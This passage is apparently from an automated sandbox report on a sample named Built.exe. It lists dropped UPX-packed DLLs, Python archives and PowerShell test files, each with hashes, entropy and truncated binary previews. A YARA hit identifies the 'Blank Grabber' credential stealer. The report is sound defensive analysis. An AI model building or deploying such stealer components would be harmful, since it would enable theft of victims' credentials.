                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xR....................................................s.................../...s.......s.......s.......s.......s.......Rich....................PE..d.....,d.........." ...".p..........@........................................0............`..........................................,..P....)....... ..........@&...........-......................................@...@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):36120
                                                                    Entropy (8bit):7.687203369989006
                                                                    Encrypted:false
                                                                    SSDEEP:768:a91cXZ8iY8JshuVLX7lB6IKpp5rbImOIta5YiSyvCKPxWE9:ajSYZhuN3QlrbImOIt47Sy7Px
                                                                    MD5:32DF18692606CE984614C7EFDA2EEC27
                                                                    SHA1:86084E39AB0AADF0ECFB82CE066B7BF14152961E
                                                                    SHA-256:B7C9C540D54AB59C16936E1639C6565CD35A8CA625F31753E57DB9CBD0EE0065
                                                                    SHA-512:679F8956370EDC4DEE32475D8440A2D2F9B6DD0EDD0E033E49FED7834A35C7ED51CCDE0995D19ED0A559A4383B99AE8C11E4E686902DB12A2A5E0A3F2C0F4A9D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g....2..g.......g.......g.......g.......g..9....g.......g..?....g...g..yg..9....g..9....g..9.^..g..9....g..Rich.g..................PE..d...?.,d.........." ...".P..........P .......................................@............`..........................................;..P....9.......0..........,............;......................................P,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):87832
                                                                    Entropy (8bit):7.917975000328177
                                                                    Encrypted:false
                                                                    SSDEEP:1536:TwZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6Vvt7v/8ImZ1Lw7SyYAPxx3:kvA5utzWfXE0V0ZK+K+Jt7vUImZ1Lwtx
                                                                    MD5:01629284F906C40F480E80104158F31A
                                                                    SHA1:6AB85C66956856710F32AED6CDAE64A60AEA5F0F
                                                                    SHA-256:A201EC286B0233644AE62C6E418588243A3F2A0C5A6F556E0D68B3C747020812
                                                                    SHA-512:107A4E857DD78DD92BE32911E3A574F861F3425E01AB4B1A7580AC799DC76122CE3165465D24C34AC7FC8F2810547AD72B4D4BA3DE76D3D61ED9BF5B92E7F7D4
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.*{w.D(w.D(w.D(~..(s.D(8.E)u.D(8.A){.D(8.@)..D(8.G)t.D(..E)t.D(<.E)u.D(w.E(..D(..I)M.D(..D)v.D(..(v.D(..F)v.D(Richw.D(........PE..d...Q.,d.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):26392
                                                                    Entropy (8bit):7.482156836734595
                                                                    Encrypted:false
                                                                    SSDEEP:384:w0Psz9rLZgNhzHjlryUOy7s6Wp6hZa7gJXT7ImQUtNkHQIYiSy1pCQjtAPxh8E9s:GihFWRupD7ImQUtc5YiSyvxAPxWE9HJ
                                                                    MD5:4A313DC23F9D0A1F328C74DD5CF3B9AB
                                                                    SHA1:494F1F5EAD41D41D324C82721AB7CA1D1B72C062
                                                                    SHA-256:2163010BFDE88A6CC15380516D31955935E243B7AD43558A89380BF5FE86337E
                                                                    SHA-512:42C712B758B35C0005B3528AF586233298C2DF4ED9F5133B8469BCA9EC421AB151CE63F3929898C73D616CD9707594FA5F96D623FC150E214A4B2276C23C296E
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1..0...1..4...1..5...1..2...1.a.0...1..0...1...0...1.a.<...1.a.1...1.a.....1.a.3...1.Rich..1.........PE..d...$.,d.........." ...".0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):44304
                                                                    Entropy (8bit):7.71997057538651
                                                                    Encrypted:false
                                                                    SSDEEP:768:EhFQ8MABQICFr2Tg+z2uPxYEV/WJqOxU/XNqppz7ImLwQFC5YiSyvLPxWE9dK:gTiFtipt/ML4NIz7ImLwQFg7SyTPxJK
                                                                    MD5:67897F8C3262AECB8C9F15292DD1E1F0
                                                                    SHA1:74F1EF77DD3265846A504F98F2E2F080EADBF58A
                                                                    SHA-256:DDBFA852E32E20D67A0C3D718CE68E9403C858D5CAD44EA6404AFF302556ABA7
                                                                    SHA-512:200B6570DB2FBB2EAC7F51CAE8E16FFB89CD46D13FBA94A7729A675F10F4432FC89A256FD6BD804FEAC528191BD116407FD58A0573487D905FC8FCA022C1ABBA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NXY..97..97..97..A...97.EE6..97.EE2..97.EE3..97.EE4..97..E6..97..96..97.AA6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d...M.,d.........." ...".p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57616
                                                                    Entropy (8bit):7.835326928436035
                                                                    Encrypted:false
                                                                    SSDEEP:1536:F1OB9LTyHEhkBFl837aWkbKlujFImOQAO7SyuWPxJ:i/LTyHRTU1kuluZImOQAOfxJ
                                                                    MD5:230025CF18B0C20C5F4ABBA63D733CA8
                                                                    SHA1:336248FDE1973410A0746599E14485D068771E30
                                                                    SHA-256:30A3BC9ED8F36E3065B583D56503B81297F32B4744BFF72DCF918407978CE332
                                                                    SHA-512:2C4D943C6587D28763CF7C21AD37CC4762674A75C643994B3E8E7C7B20576D5674CF700FDFADDC1A834D9BF034BF2F449D95351C236FDE720505CCDD03369BB1
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................n......................................................................................Rich...................PE..d...Q.,d.........." ...".........`..@....p...................................0............`..........................................+..P....)....... .......................+..$...................................@...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):63768
                                                                    Entropy (8bit):7.854684407863412
                                                                    Encrypted:false
                                                                    SSDEEP:1536:xzB+lCu0pTB1zYk0UdJSqtEZImC7b0E7SyZfPx:9cCu0pHzD0UFtWImC7bXbnx
                                                                    MD5:0D15B2FDFA03BE76917723686E77823C
                                                                    SHA1:EFD799A4A5E4F9D15226584DD2EE03956F37BDAF
                                                                    SHA-256:2FC63ABE576C0D5FE031CF7EE0E2F11D9C510C6DBACFC5DD2E79E23DA3650EE8
                                                                    SHA-512:E21AB5EBE8B97243CF32CA9181C311978E203852847E4BEB5E6ADA487038C37DEC18A2B683E11E420E05ACE014ACA2172B2DDA15930BAB944053843E25623227
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........i...i...i.......i..h...i..l...i..m...i..j...i.o.h...i.i.h...i...h.'.i..h...i.o.d...i.o.i...i.o.....i.o.k...i.Rich..i.........................PE..d...R.,d.........." ..."............`.....................................................`.........................................p...d....................P......................................................p...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):1437065
                                                                    Entropy (8bit):5.59096386645216
                                                                    Encrypted:false
                                                                    SSDEEP:24576:mQR5pATt7xm4lUKdcubgAnyfb3s0iwhBdYf9P3sGHHO:mQR5pQxmzG8
                                                                    MD5:5011D68FBEA0156FE813D00C1F7D9AF2
                                                                    SHA1:D76D817CAC04D830707CE97B4D0D582A988E1DBD
                                                                    SHA-256:B9E9569931047CD6A455EC826791C2E6C249C814DC0FA71F0BD7FA7F49B8948D
                                                                    SHA-512:6A5AFFDE07B5150B5AEE854851F9F68C727B0F5BA83513C294D27461546A5EF67BF6C5869FC4ABDADAA9BF1767EA897910C640C5494B659A29004050C9C5D099
                                                                    Malicious:false
                                                                    Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):124608
                                                                    Entropy (8bit):7.65391351140966
                                                                    Encrypted:false
                                                                    SSDEEP:3072:GycgEfVuWi+vsR0Yt+eOapFM5EzrU9qyYOClC3il5sveaU6G:GycFN7i+vsR0Y+a/M5EYzY7SiIU6G
                                                                    MD5:2C4CC5F2130D32BE2F863A2D33FD762D
                                                                    SHA1:4BF5AA1038881465EA548683DCAB0E3F0E85A0D3
                                                                    SHA-256:250C9B247E0CFD68D8B76C998320CB085BB339E8016C7D7F187931E20E1C4692
                                                                    SHA-512:329E35F438629F49A413FCCCA1041DCF47FD4DCFBCEA07483C43EFF50234D4C5E7CDA00E115B8453F0C560935E85AD2649BF572F606721ED7521288E29E49FFF
                                                                    Malicious:false
                                                                    Preview:PK........Y..XXw~.J...J.......stub-o.pyc.........R.f.Q........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1112856
                                                                    Entropy (8bit):7.937513332106868
                                                                    Encrypted:false
                                                                    SSDEEP:24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
                                                                    MD5:BBC1FCB5792F226C82E3E958948CB3C3
                                                                    SHA1:4D25857BCF0651D90725D4FB8DB03CCADA6540C3
                                                                    SHA-256:9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
                                                                    SHA-512:3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):29968
                                                                    Entropy (8bit):7.677818197322094
                                                                    Encrypted:false
                                                                    SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                    MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                    SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                    SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                    SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):209688
                                                                    Entropy (8bit):7.925861479415686
                                                                    Encrypted:false
                                                                    SSDEEP:3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
                                                                    MD5:AD0A2B4286A43A0EF05F452667E656DB
                                                                    SHA1:A8835CA75768B5756AA2445CA33B16E18CEACB77
                                                                    SHA-256:2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
                                                                    SHA-512:CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1703184
                                                                    Entropy (8bit):7.993705819120503
                                                                    Encrypted:true
                                                                    SSDEEP:49152:+kJce+tFLwBxJ01hS41mhwuxtH59x/xWI:Xce+tA0D/1HuLZpt
                                                                    MD5:9E985651962CCBCCDF5220F6617B444F
                                                                    SHA1:9238853FE1CFF8A49C2C801644D6AA57ED1FE4D2
                                                                    SHA-256:3373EE171DB8898C83711EC5067895426421C44F1BE29AF96EFE00C48555472E
                                                                    SHA-512:8B8E68BBE71DCD928DBE380FE1A839538E7B8747733BA2FD3D421BA8D280A11BA111B7E8322C14214D5986AF9C52AB0C75288BBB2A8B55612FB45836C56DDC36
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..*..*..*..+..*.....*../..*.....*..)..*......*..+..*..+..*.(.'.).*.(.*..*.(....*.(.(..*.Rich.*.........PE..d.....,d.........." ..."..........D...]...D...................................^...........`.........................................H.].......].......].......V.40...........^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):630736
                                                                    Entropy (8bit):6.409476333013752
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                    MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                    SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                    SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                    SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):456
                                                                    Entropy (8bit):4.447296373872587
                                                                    Encrypted:false
                                                                    SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                    MD5:4531984CAD7DACF24C086830068C4ABE
                                                                    SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                    SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                    SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key, Author: Joe Security
                                                                    Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):26384
                                                                    Entropy (8bit):7.436534513949536
                                                                    Encrypted:false
                                                                    SSDEEP:768:yjW1JNYpJjdImQGtq5YiSyvaAPxWE9Uux:yjW1XCjdImQGto7SyFPxBx
                                                                    MD5:27703F9A7C7E90E049D5542FB7746988
                                                                    SHA1:BC9C6F5271DEF4CC4E9436EFA00F231707C01A55
                                                                    SHA-256:FCC744CFCCC1C47F6F918E66CFC1B73370D2CECDB776984FABB638745EBE3A38
                                                                    SHA-512:0875AD48842BBAC73E59D4B0B5D7083280BDE98336C8856160493CC63F7C3A419F4471F19C8537E5C8515E194C6604F9EFA07D9D9AF5DEF2F374406D316436A8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r..t6.t'6.t'6.t'?..'4.t'y.u&4.t'y.q&:.t'y.p&>.t'y.w&2.t'.u&4.t'6.u't.t'}.u&3.t'.y&7.t'.t&7.t'.'7.t'.v&7.t'Rich6.t'........PE..d...$.,d.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):625432
                                                                    Entropy (8bit):7.993673176414941
                                                                    Encrypted:true
                                                                    SSDEEP:12288:dyVH8JO5nlelPUdcp1rdCJp/fBewYAoAu0tZV6w576ahQjaxUk:8t8uaUdcV0xYtAoAu0H0w576yQjO9
                                                                    MD5:08CE33649D6822FF0776EDE46CC65650
                                                                    SHA1:941535DABDB62C7CA74C32F791D2F4B263EC7D48
                                                                    SHA-256:48F50E8A693F3B1271949D849B9A70C76ACAA4C291608D869EFE77DE1432D595
                                                                    SHA-512:8398E54645093E3F169C0B128CBEDA3799D905173C9CB9548962ECBAF3D305620F0316C7C3F27077B148B8F6D3F6146B81C53B235F04AC54668DAB05B929D52F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C3;..RU..RU..RU..*..RU.H.T..RU.H.P..RU.H.Q..RU.H.V..RU.L*T..RU..RT..RU...]..RU...U..RU......RU...W..RU.Rich.RU.........................PE..d...K.,d.........." ...".0...0......@.....................................................`.............................................."..........................................................................P...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc....0..........................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):302872
                                                                    Entropy (8bit):7.986910218113021
                                                                    Encrypted:false
                                                                    SSDEEP:6144:9k/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiR:9kUfQJbUV2MhCwEQc5Np9zR
                                                                    MD5:F86F9B7EB2CB16FB815BB0650D9EF452
                                                                    SHA1:B9E217146EB6194FC38923AF5208119286C365AD
                                                                    SHA-256:B37D56AD48A70B802FB337D721120D753270DBDA0854B1BFB600893FB2CE4E7A
                                                                    SHA-512:6C448F6D6C069BA950C555529557F678DFD17C748B2279D5EEC530D7EB5DB193AA1CA18DD3CE9F5220E8681A0E50B00D7DE93C6744476C0E1872DAFD9D5DE775
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................................................................y.........Rich..........................PE..d...'.,d.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
